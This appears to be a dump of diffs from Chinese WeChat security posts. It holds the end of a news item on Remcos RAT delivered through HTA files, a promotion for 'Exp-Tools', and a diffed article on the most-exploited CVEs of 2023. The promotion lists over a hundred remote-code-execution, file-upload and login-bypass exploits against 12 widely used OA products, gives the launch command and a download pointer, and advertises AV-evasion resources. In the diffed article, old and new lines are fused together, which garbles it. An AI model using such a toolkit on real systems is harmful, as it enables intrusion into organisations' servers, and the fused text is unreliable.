值得注意的是,这一 HTA 文件据称使用 JavaScript、VBScript 等脚本并结合 Base64 编码算法和 PowerShell 命令进行多层包装以避免被安全公司发现。一旦 HTA 文件被启动它会将黑客预备的 dllhost.exe 下载到受害者设备上运行而后相关 exe 文件会将恶意代码注入到一个新的进程 Vaccinerende.exe 从而传播 Remcos RAT 木马。
![](https://mmbiz.qpic.cn/mmbiz_jpg/KGSIlMW3xHfjdbzxaBbOTWRDdpNhc4OLfric2uHfIia96OmCIh43cQLpic7FgmxmcTFUJPniaYTRAIiccia0MbReRgnA/640?wx_fmt=jpeg&from=appmsg "安全公司曝光黑客利用 Office 已知漏洞散播 Remcos RAT 木马程序")
▲ 黑客的 HTA 文件采用多重包装以防止遭到安全公司分析
研究人员指出,黑客为隐藏其踪迹利用了多种反追踪技术,包括“异常处理”、“动态 API 调用”等手段,以达到规避检测的目的。就此,安全公司提醒企业及用户个人应及时更新 Office 软件,降低被黑客攻击的风险。

View File

@ -0,0 +1,451 @@
# 工具 | 集成高危漏洞exp的实用性渗透工具
渗透安全团队 2024-11-18 03:02
由于微信公众号推送机制改变了,快来
**星标**
不再迷路,谢谢大家!
![](https://mmbiz.qpic.cn/mmbiz_png/pPVXCo8Wd8DungicHdGVdJpoQp8uIUIs13xBa1eTRSObiczwsfbtDvKU0ibAfkHegDGV2o4daf95jVdO9rnFeny7A/640?wx_fmt=png "")
**01**
**工具介绍**
该工具使用了ExpDemo-JavaFX项目保留了核心的数据包请求接口使用jdk1.8环境开发。目前编写了oa、设备、框架、产品等多个系列对相关漏洞进行复现和分析极力避免exp的误报和有效性。
截止到目前为止已实现了用友、泛微、蓝凌、万户、帆软报表、致远、通达、红帆、金和、金蝶、广联达、华天动力总共12个OA。全部是命令执行、文件上传类的漏洞包括前台和后台。
用友已完成:
- 用友NC-BshServlet 远程命令执行
- 用友NC-BshServlet-bypass 远程命令执行
- 用友NC accept 文件上传
- 用友NC uapim 文件上传
- 用友NC mp 文件上传
- 用友NC saveXmlToFileServlet 文件上传
- 用友NC FileManager 文件上传
- 用友NC saveImageServlet 文件上传
- 用友NC反序列化-1
- 用友NC反序列化-2
- 用友NC反序列化-3
- 用友NC Cloud 文件写入
- 用友NC Cloud uploadChunk文件上传
- 用友NC Cloud importhttpscer文件上传
- 用友U8CRM swfupload 文件上传
- 用友U8CRM getemaildata 文件上传
- 用友U8CRM crmtools 文件上传
- 用友GRP-U8 UploadFileData 文件上传
- 用友GRP-U8 U8AppProxy 文件上传
- 用友GRP-U8 services 文件写入
- 用友GRP-U8 servlet 文件上传
- 用友U8C 文件上传
- 用友U8C 反序列化-1
- 用友U8C 反序列化-2
- 用友U8C esnserver文件写入
- 用友U9 PatchFile 文件写入
- 用友畅捷通T+密码重置
- 用友畅捷通T+文件上传-1
- 用友畅捷通T+文件上传-2
- 用友畅捷通T+GetStoreWarehouseByStore反序列化
- 用友KSOA ImageUpload 文件上传
- 用友KSOA Attachment 文件写入
- 用友移动管理平台Apk文件上传
- 用友移动管理平台Icon文件上传
- 用友U8-OA文件上传
- 用友UFIDA NC 文件写入
泛微已完成:
- 泛微eoffice OfficeServer 文件上传
- 泛微eoffice UploadFile 文件上传
- 泛微eoffice uploadify 文件上传
- 泛微eoffice ajax 文件上传
- 泛微BshServlet 远程命令执行
- 泛微ecology前台sql注入-1
- 泛微ecology前台sql注入-2
- 泛微ecology前台sql注入-3
- 泛微ecology任意用户爆破
- 泛微ecology任意用户登录-1
- 泛微ecology任意用户登录-2
- 泛微ecology FileClient 文件上传
- 泛微ecology WorkflowServiceXml命令执行
- 泛微ecology KtreeUploadAction 文件上传
- 泛微ecology uploaderOperate 文件上传
- 泛微ecology weaver.common.Ctrl 文件上传
- 泛微ecology后台风格文件上传
- 泛微ecology后台流程命令执行
- 泛微ecology后台库存文件上传
- 泛微emobile client命令执行
- 泛微emobile messageType命令执行
- 泛微emobile lang2sql文件覆盖
蓝凌已完成:
- 蓝凌OA 任意用户登录
- 蓝凌OA SSRF
- 蓝凌OA SSRF BeanShell 文件上传
- 蓝凌OA SSRF XmlDecoder 文件上传
- 蓝凌OA treexml 命令执行
- 蓝凌OA界面文件上传
- 蓝凌OA主题文件上传
- 蓝凌OA jg_service文件上传
- 蓝凌OA sysUiComponent文件复制
- 蓝凌OA后台模板文件上传
- 蓝凌EIS api文件上传
万户已完成:
- 万户OA用户密码泄露
- 万户OA fileUpload 文件上传
- 万户OA officeserverservlet 文件上传
- 万户OA smartUpload 文件上传
- 万户OA OfficeServer 文件上传
- 万户OA senddocument 文件导入
- 万户OA wpsservlet 文件上传
- 万户OA SOAP 文件写入
- 万户OA SOAP创建文件写入
帆软报表已完成:
- 帆软报表任意文件读取
- 帆软报表任意文件读取-bypass
- 帆软报表任意文件覆盖
- 帆软报表未授权命令执行-1
- 帆软报表未授权命令执行-2
- 帆软报表未授权命令执行-3
- 帆软报表channel命令执行-1
- 帆软报表channel命令执行-2
- 帆软报表ReportServer sql注入
- 帆软报表后台插件文件上传
- 帆软报表后台主题文件上传
致远已完成:
- 致远session泄露processUpload文件上传
- 致远uploadMenuIcon文件上传
- 致远ajax文件上传
- 致远ajax文件上传-bypass
- 致远wpsAssistServlet文件上传
- 致远htmlofficeservlet文件上传
- 致远任意用户密码重置
- 致远audit-admin用户默认密码
- 致远audit-admin用户重置密码
- 致远后台模板文件上传
- 致远后台模板管理器文件上传
- 致远后台表格文件写入
- 致远后台ofd文件解压
- 致远后台jdbc文件写入
- 致远后台constDef代码执行
- 致远帆软报表文件读取
- 致远帆软报表文件读取-bypass
- 致远帆软报表日志命令执行
- 致远帆软报表后台插件文件上传
- 致远帆软报表后台主题文件上传
- 致远M1命令执行
通达已完成:
- 通达任意用户登录-1
- 通达任意用户登录-2
- 通达任意用户登录-3
- 通达任意用户登录-4
- 通达Ispirit文件上传
- 通达ueditor文件上传
- 通达gateway反序列化
- 通达后台附件文件上传
红帆已完成:
- 红帆OA任意文件上传
- 红帆OA任意文件写入
金和已完成:
- 金和OA命令执行
- 金和OA editeprint文件写入
- 金和OA EditMain文件写入
- 金和OA saveAsOtherFormatServlet文件上传
- 金和OA OfficeServer文件上传
- 金和OA UploadFileBlock文件上传
- 金和OA servlet 文件上传
- 金和OA jcsUploadServlet文件上传
- 金和OA UploadFileEditorSave文件上传
- 金和OA viewConTemplate 模板注入
金蝶已完成:
- 金蝶云星空反序列化-1
- 金蝶云星空反序列化-2
- 金蝶云星空反序列化-3
- 金蝶云星空文件上传
- 金蝶EAS file文件上传
- 金蝶EAS logo文件上传
- 金蝶Apusic 文件上传
广联达已完成:
- 广联达OA GetIMDictionary sql注入
- 广联达OA 任意用户登录
- 广联达OA 用户文件上传
- 广联达OA 后台文件上传
华天动力已完成:
- 华天动力OA 登录绕过
- 华天动力OA ntkoupload 文件上传
- 华天动力OA Servlet文件上传
**02**
**工具使用**
使用JDK8启动命令如下
```
java -javaagent:Exp-Tools-1.3.1-encrypted.jar -jar Exp-Tools-1.3.1-encrypted.jar
```
![](https://mmbiz.qpic.cn/mmbiz_jpg/pPVXCo8Wd8BpaQTHrjCa8ph7r5AEqcOaZHwwjdo5gD6TD716tjzuW9Su1Jces18as8Qz7rY0aBdA7crtCeyxLw/640?wx_fmt=jpeg "")
**03**
**工具下载**
![](https://mmbiz.qpic.cn/mmbiz_gif/pLGTianTzSu7XRhTMZOBAqXehvREhD5ThABGJdRialUx3dQWwO7fclsicyiajicKfvXV4kHs38nkwFxUSckVF2nYlibA/640?wx_fmt=gif&random=0.09738205945672873&wxfrom=5&wx_lazy=1&tp=wxpic "")
**翻到文章最底部点击“阅读原文”下载链接**
**★**
**付费圈子**
**欢 迎 加 入 星 球 **
**代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员**
![](https://mmbiz.qpic.cn/mmbiz_gif/pLGTianTzSu7XRhTMZOBAqXehvREhD5ThABGJdRialUx3dQWwO7fclsicyiajicKfvXV4kHs38nkwFxUSckVF2nYlibA/640?wx_fmt=gif&random=0.4447566002908574&tp=wxpic&wxfrom=5&wx_lazy=1 "")
**进成员内部群**
![](https://mmbiz.qpic.cn/mmbiz_jpg/pPVXCo8Wd8AQHAyOTgM5sLrvP6qiboXljGWG0uOdvcNR8Qw5QJLxSVrbFds2j7MxExOz1ozb9ZoYwR68leoLdAg/640?wx_fmt=jpeg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_gif/pLGTianTzSu7XRhTMZOBAqXehvREhD5ThABGJdRialUx3dQWwO7fclsicyiajicKfvXV4kHs38nkwFxUSckVF2nYlibA/640?wx_fmt=gif&random=0.09738205945672873&tp=wxpic&wxfrom=5&wx_lazy=1 "")
**星球的最近主题和星球内部工具一些展示******
![](https://mmbiz.qpic.cn/mmbiz_jpg/pPVXCo8Wd8Doq0iczyRiaBfhTQyfzqSGuia4lfHfazabEKr2EDe7sGVoxUhLrNRA4FbI1yef6IkWdmzxvZrTiaJncg/640?wx_fmt=jpeg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_png/pPVXCo8Wd8BmE6FAA8Bq7H9GZIRt1xYZpmYNWxrrzolt71FtX5HyM03H0cxkiaYelv7ZSajLtibEdBXUpCibdItXw/640?wx_fmt=png&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_png/pPVXCo8Wd8ADSxxicsBmvhX9yBIPibyJTWnDpqropKaIKtZQE3B9ZpgttJuibibCht1jXkNY7tUhLxJRdU6gibnrn0w/640?wx_fmt=png&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_png/pPVXCo8Wd8DKZcqe8mOKY1OQN5yfOaD5MpGk0JkyWcDKZvqqTWL0YKO6fmC56kSpcKicxEjK0cCu8fG3mLFLeEg/640?wx_fmt=png&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_png/pPVXCo8Wd8DAc8LkYEjnluf7oQaBR9CR7oAqnjIIbLZqCxwQtBk833sLbiagicscEic0LSVfOnbianSv11PxzJdcicQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/pPVXCo8Wd8B96heXWOIseicx7lYZcN8KRN8xTiaOibRiaHVP4weL4mxd0gyaWSuTIVJhBRdBmWXjibmcfes6qR1w49w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=wxpic "")
![](https://mmbiz.qpic.cn/mmbiz_png/pPVXCo8Wd8DAc8LkYEjnluf7oQaBR9CRBgpPoexbIY7eBAnR7sWS1BlBAQX51QhcOOOz06Ct2x1cMD25nA6mJQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/pPVXCo8Wd8AqNwoQuOBy9yePOpO5Kr6aHIxj7d0ibfAuPx9fAempAoH9JfIgX4nKzCwDyhQzPrRIx4upyw5yT4Q/640?wx_fmt=png&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "")
****
![](https://mmbiz.qpic.cn/mmbiz_gif/pLGTianTzSu7XRhTMZOBAqXehvREhD5ThABGJdRialUx3dQWwO7fclsicyiajicKfvXV4kHs38nkwFxUSckVF2nYlibA/640?wx_fmt=gif&random=0.4447566002908574&tp=wxpic&wxfrom=5&wx_lazy=1 "")
**加入安全交流群**
[                ](http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247513602&idx=1&sn=98045772ff9aebe8792552e32523bf83&chksm=c1764badf601c2bbcc199da519611ac8c36c17e5a0554fe32ab9d9769403a495187058f19f3d&scene=21#wechat_redirect)
               
**信 安 考 证**
需要考以下各类安全证书的可以联系我,下方扫码回复
**考证**
进交流群,价格优惠、组团更便宜,还送【
渗透安全团队
】知识星球**1**年!
<table><tbody style="outline: 0px;"><tr style="outline: 0px;"><td width="557" valign="top" style="outline: 0px;word-break: break-all;hyphens: auto;"><p style="outline: 0px;"><span style="outline: 0px;font-size: 14px;letter-spacing: 0.51px;">CISP、PTE、PTS、DSG、IRE、IRS、</span><span style="outline: 0px;font-size: 14px;letter-spacing: 0.51px;">NISP、</span><span style="outline: 0px;font-size: 14px;letter-spacing: 0.51px;">PMP、CCSK、CISSP、ISO27001...</span></p></td></tr></tbody></table>
![](https://mmbiz.qpic.cn/mmbiz_png/pPVXCo8Wd8AOzYX7kxefGbGGZg3g1ltkN30q9hceg23PiczgUqMT0EE9w0fLK9uw1eKWwQX9TljXQe1OQeHRZ2Q/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**教程如下图**
![](https://mmbiz.qpic.cn/mmbiz_png/pPVXCo8Wd8C3Gu1libJC0muV1WmOFa3XM3fTyOiaOJYPgCiaHV6gkJJBia6Fjeds9w9pxxyyPNJhbcfK3I1tcGueTg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/ndicuTO22p6ibN1yF91ZicoggaJJZX3vQ77Vhx81O5GRyfuQoBRjpaUyLOErsSo8PwNYlT1XzZ6fbwQuXBRKf4j3Q/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=wxpic "")
**推荐阅读**
[干货|史上最全一句话木马](http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247489259&idx=1&sn=b268701409ad4e8785cd5ebc23176fc8&chksm=c175eb44f60262527120100bd353b3316948928bd7f44cf9b6a49f89d5ffafad88c6f1522226&scene=21#wechat_redirect)
[干货 | CS绕过vultr特征检测修改算法](http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247486980&idx=1&sn=6d65ae57f03bd32fddb37d7055e5ac8e&chksm=c175f3abf6027abdad06009b2fe964e79f2ca60701ae806b451c18845c656c12b9948670dcbc&scene=21#wechat_redirect)
[实战 | 用中国人写的红队服务器搞一次内网穿透练习](http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247488628&idx=1&sn=ff2c617cccc00fe262ed9610c790fe0e&chksm=c175e9dbf60260cd0e67439304c822d28d510f1e332867e78a07d631ab27143309d14e27e53f&scene=21#wechat_redirect)
[实战 | 渗透某培训平台经历](http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247488613&idx=1&sn=12884f3d196ac4f5c262a587590d516d&chksm=c175e9caf60260dcc0d5d81a560025d548c61fda975d02237d344fd79adc77ac592e7e562939&scene=21#wechat_redirect)
[实战 | 一次曲折的钓鱼溯源反制](http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247489278&idx=1&sn=5347fdbf7bbeb3fd37865e191163763f&chksm=c175eb51f602624777fb84e7928bb4fa45c30f35e27f3d66fc563ed97fa3c16ff06d172b868c&scene=21#wechat_redirect)
**免责声明**
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为**此**
承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

View File

@ -1,93 +1,105 @@
# 打补丁要快0Day漏洞正在被黑客广泛利用 # 打补丁要快0Day漏洞正在被黑客广泛利用
老布 FreeBuf 2024-11-16 02:02 老布 安小圈 2024-11-18 00:45
![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "") **安小圈**
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn57I9BBPXUxN2OTqkz6aYOPu6aKlibzPGHqRejhibwypanMenmRkrlDyIw/640?wx_fmt=jpeg&from=appmsg "") 第547期
**打补丁  0Day漏洞**
****
 
![](https://mmbiz.qpic.cn/mmbiz_png/BWicoRISLtbPBJwyIYSDk9B1QK8O1iaTEpcB2iauvfibr9duqiabUnDIWmdWERhGuBGniarCqRjj5JX1h4ytDbcOHcUA/640?wx_fmt=png "")
近日美国、英国、加拿大、澳大利亚和新西兰五眼联盟网络安全机构联合发布了报告公布了2023年最常被利用的漏洞清单。其中零日漏洞已经成为黑客最常利用的漏洞类型。 近日美国、英国、加拿大、澳大利亚和新西兰五眼联盟网络安全机构联合发布了报告公布了2023年最常被利用的漏洞清单。
其中,零日漏洞已经成为黑客最常利用的漏洞类型。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn5gBHud6gWfQnW07uXdl6PtawdDlU5rM1u60QU3yAG8vfnWT1EXsq8UQ/640?wx_fmt=jpeg&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn5gBHud6gWfQnW07uXdl6PtawdDlU5rM1u60QU3yAG8vfnWT1EXsq8UQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
该警告强调攻击者们正越来越多地利用零日漏洞入侵企业与2022年相比零日漏洞利用的有所增长。 该警告强调攻击者们正越来越多地利用零日漏洞入侵企业与2022年相比零日漏洞利用的有所增长。
与前几年旧的、未修补的漏洞占据列表的主导地位不同的是在2023年漏洞利用趋势中零日漏洞利用的激增这反映出攻击者漏洞攻击策略的变化 与前几年旧的、未修补的漏洞占据列表的主导地位不同的是在2023年漏洞利用趋势中零日漏洞利用的激增这反映出攻击者漏洞攻击策略的变化
**在漏洞公布后的几天内快速利用。** **在漏洞公布后的几天内快速利用。**
过去,安全漏洞被利用或许需要几个月时间,但现在,发现与利用之间的时间间隔已经减少到了几天甚至是几个小时。 过去,安全漏洞被利用或许需要几个月时间,但现在,发现与利用之间的时间间隔已经减少到了几天甚至是几个小时。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn5tDbaKVQQIXcCFbQXT171c9g1aPzuU2xapM8YkPc6j7WMRg31OQBRNg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn5tDbaKVQQIXcCFbQXT171c9g1aPzuU2xapM8YkPc6j7WMRg31OQBRNg/640?wx_fmt=jpeg&from=appmsg "")
报告另一个数据也指出,大量漏洞在披露后的两年内被积极利用,突显了及时补丁管理的必要性。 报告另一个数据也指出,大量漏洞在披露后的两年内被积极利用,突显了及时补丁管理的必要性。
在发布的2023年漏洞利用榜TOP15中CVE-2023-3519漏洞位居榜首该漏洞影响NetScaler ADC和NetScaler Gateway的多个版本包括13.0、13.1、13.1-FIPS、12.1-FIPS和12.1-NDcPP等在修补期间被广泛利用导致了大量的设备被攻陷。 在发布的2023年漏洞利用榜TOP15中CVE-2023-3519漏洞位居榜首该漏洞影响NetScaler ADC和NetScaler Gateway的多个版本包括13.0、13.1、13.1-FIPS、12.1-FIPS和12.1-NDcPP等在修补期间被广泛利用导致了大量的设备被攻陷。
CVE-2023-20198是另外一个排在前列的漏洞影响Cisco IOS XE系统中的Web管理用户界面允许黑客获得设备中最高等级的Level 15权限从而可以完全控制相关设备执行任意命令。
此外Log4Shell漏洞CVE-2021-44228影响Apache的Log4j库由于其广泛应用于各种软件应用中即使在最初披露两年后仍然被利用。
CVE-2023-20198是另外一个排在前列的漏洞影响Cisco IOS XE系统中的Web管理用户界面允许黑客获得设备中最高等级的Level 15权限从而可以完全控制相关设备执行任意命令。此外Log4Shell漏洞CVE-2021-44228影响Apache的Log4j库由于其广泛应用于各种软件应用中即使在最初披露两年后仍然被利用。 Tenable的高级研究员Satnam Narang表示“入选2023年最常被利用漏洞榜的漏洞有一个共同点即它们都暴露于互联网服务或系统中包括从VPN解决方案到远程管理界面。
这些面向互联网的系统中往往会使用包含已知漏洞的软件,从而导致被黑客成规模利用。
另外在漏洞利用榜中最古老的一个漏洞是七年前公布的CVE-2017-6742即便是到了2023年仍然有很多的黑客在利用该漏洞对企业发起攻击。
而根据一些情报信息仍有大约24,000个Cisco IOS和IOS XE系统可能面临CVE-2023-20198漏洞的攻击。
![](https://mmbiz.qpic.cn/mmbiz_png/BWicoRISLtbNFGhZSttuhIzVnNJAlxXcntzQT9TkmjBdPicssdjUB7XlDJeXtbFs8ygsmTkqbl0I1KWTgdmHh9Yg/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/mmbiz_gif/0YKrGhCM6DbI5sicoDspb3HUwMHQe6dGezfswja0iaLicSyzCoK5KITRFqkPyKJibbhkNOlZ3VpQVxZJcfKQvwqNLg/640?wx_fmt=gif&tp=webp&wxfrom=5&wx_lazy=1 "")
****#
- # Windows 0-Day 漏洞-(CVSS 9.8) CVE-2024-43491
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247528131&idx=1&sn=ee17bfc91d1275e5a25a8ac88e775324&chksm=ce22397bf955b06dbab2cbeebf6a2f9ba2bb2e364f2651879c3b66d93a4cc9265c12c0cd0197&scene=21#wechat_redirect)
- [腾讯【微信】存在可能导致远程代码执行【漏洞】](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247528131&idx=1&sn=ee17bfc91d1275e5a25a8ac88e775324&chksm=ce22397bf955b06dbab2cbeebf6a2f9ba2bb2e364f2651879c3b66d93a4cc9265c12c0cd0197&scene=21#wechat_redirect)
Tenable的高级研究员Satnam Narang表示“入选2023年最常被利用漏洞榜的漏洞有一个共同点即它们都暴露于互联网服务或系统中包括从VPN解决方案到远程管理界面。这些面向互联网的系统中往往会使用包含已知漏洞的软件从而导致被黑客成规模利用。 [](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247525096&idx=2&sn=d1467825e0d943445aa7437f8fa9916c&chksm=ce223550f955bc4687eab62af06027a266a6c7fd068413e62e7ca85aa51fa28bc16075b37201&scene=21#wechat_redirect)
- [CVE-2024-72629.3WPS【漏洞】已经被武器化](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247525096&idx=2&sn=d1467825e0d943445aa7437f8fa9916c&chksm=ce223550f955bc4687eab62af06027a266a6c7fd068413e62e7ca85aa51fa28bc16075b37201&scene=21#wechat_redirect)
另外在漏洞利用榜中最古老的一个漏洞是七年前公布的CVE-2017-6742即便是到了2023年仍然有很多的黑客在利用该漏洞对企业发起攻击。而根据一些情报信息仍有大约24,000个Cisco IOS和IOS XE系统可能面临CVE-2023-20198漏洞的攻击。 [](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524771&idx=1&sn=fb1d9a27c4e29c56ccd88a5f981b2d8f&chksm=ce22361bf955bf0d27a75c950d19d6cbfcdf4b5796b9341aaa6551dc56cf046b2426a3c861ff&scene=21#wechat_redirect)
- [微软披露Office最新【零日漏洞】可能导致数据泄露](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524771&idx=1&sn=fb1d9a27c4e29c56ccd88a5f981b2d8f&chksm=ce22361bf955bf0d27a75c950d19d6cbfcdf4b5796b9341aaa6551dc56cf046b2426a3c861ff&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524688&idx=1&sn=86e599b109e7188ccf652be2fd32b30b&chksm=ce2236e8f955bffef66fa55c274018570ce65982369f4760cb1a5250bbd8f7692b86b0a8222b&scene=21#wechat_redirect)
FreeBuf粉丝交流群招新啦 - [【微软警告】OpenVPN存在【漏洞】| 可能存在漏洞链](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524688&idx=1&sn=86e599b109e7188ccf652be2fd32b30b&chksm=ce2236e8f955bffef66fa55c274018570ce65982369f4760cb1a5250bbd8f7692b86b0a8222b&scene=21#wechat_redirect)
在这里,拓宽网安边界
甲方安全建设干货;
乙方最新技术理念;
全球最新的网络安全资讯;
群内不定期开启各种抽奖活动;
FreeBuf盲盒、大象公仔......
扫码添加小蜜蜂微信回复「加群」,申请加入群聊
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") [](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524560&idx=1&sn=0ef4d3371f0d6374894ad5259e45ac63&chksm=ce223768f955be7e49bfe14375d3fb22a0718b0474ca42dbafe5c21c15047f40a57e8c82abf7&scene=21#wechat_redirect)
- [【爆】堪比Windows蓝屏危机| Linux被曝12年史诗级漏洞“投毒者”是谷歌](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524560&idx=1&sn=0ef4d3371f0d6374894ad5259e45ac63&chksm=ce223768f955be7e49bfe14375d3fb22a0718b0474ca42dbafe5c21c15047f40a57e8c82abf7&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
> https://www.bleepingcomputer.com/news/security/leaked-info-of-122-million-linked-to-b2b-data-aggregator-breach/
>
>
>
>
>
>
>
>
>
>
>
>
>
>
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") [](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524560&idx=1&sn=0ef4d3371f0d6374894ad5259e45ac63&chksm=ce223768f955be7e49bfe14375d3fb22a0718b0474ca42dbafe5c21c15047f40a57e8c82abf7&scene=21#wechat_redirect)
- [0.0.0.0 Day【漏洞】曝光 | 谷歌、Safari、火狐等主流浏览器面临威胁](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524229&idx=1&sn=46ad42b4a0f5f4d8a0cce1552ba62b7f&chksm=ce22c83df955412b3e8501a9ac056c1330bc269026a2366fedc91e8a5a5bd083ad650fe0eed9&scene=21#wechat_redirect)
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect)
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect) [](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524025&idx=1&sn=d71c239f2b207cc5d31dd2ff74bf9ce2&chksm=ce22c901f95540172b025e9306778f4066cde3c6150400af01fe22a3e693845263944eefb4d6&scene=21#wechat_redirect)
- [核弹级【漏洞预警】Windows 远程桌面 | 授权服务远程代码执行漏洞(CVE-2024-38077)](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524025&idx=1&sn=d71c239f2b207cc5d31dd2ff74bf9ce2&chksm=ce22c901f95540172b025e9306778f4066cde3c6150400af01fe22a3e693845263944eefb4d6&scene=21#wechat_redirect)
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "") [](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247520585&idx=1&sn=35cdaeef004b4615fb052326c8594c26&chksm=ce22c6f1f9554fe705c05a9534506a615cb539c264dd5a12cbbe7cedd831507503cd65936826&scene=21#wechat_redirect)
- # 【0 day】阿里 NACOS 远程命令执行漏洞
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247520860&idx=1&sn=0b6114b76495de68dba79b87b520da16&chksm=ce22c5e4f9554cf2ae8ff183dcb6d7249d8ea9fb4244f5b1d8b9950b3d8035faf8e45ef2a03a&scene=21#wechat_redirect)
- # 【盘点】最严重的39个硬件安全漏洞
